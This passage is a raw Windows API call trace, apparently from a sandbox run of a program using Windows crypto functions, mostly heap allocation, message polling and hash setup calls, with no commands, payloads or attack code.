lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.884] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.884] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0032.884] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.884] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.884] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.884] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0032.884] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.884] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0032.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.885] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.886] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.886] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.886] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.887] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.887] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.887] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.887] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.887] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.887] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.887] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.887] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0032.887] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.887] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0032.887] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.887] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.887] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.887] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.887] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0032.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0032.888] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.888] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.888] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.888] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0032.888] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.888] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.888] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.888] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.888] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.888] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0032.888] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0032.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.889] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0032.889] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.889] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0032.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0032.889] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0032.889] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.889] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.889] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.889] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.890] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0032.890] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0032.890] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0032.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.890] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.890] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0032.891] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0032.891] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0032.891] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.891] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.891] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0032.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.892] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.892] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0032.892] RtlAllocateHeap (HeapHandle=0x770000, 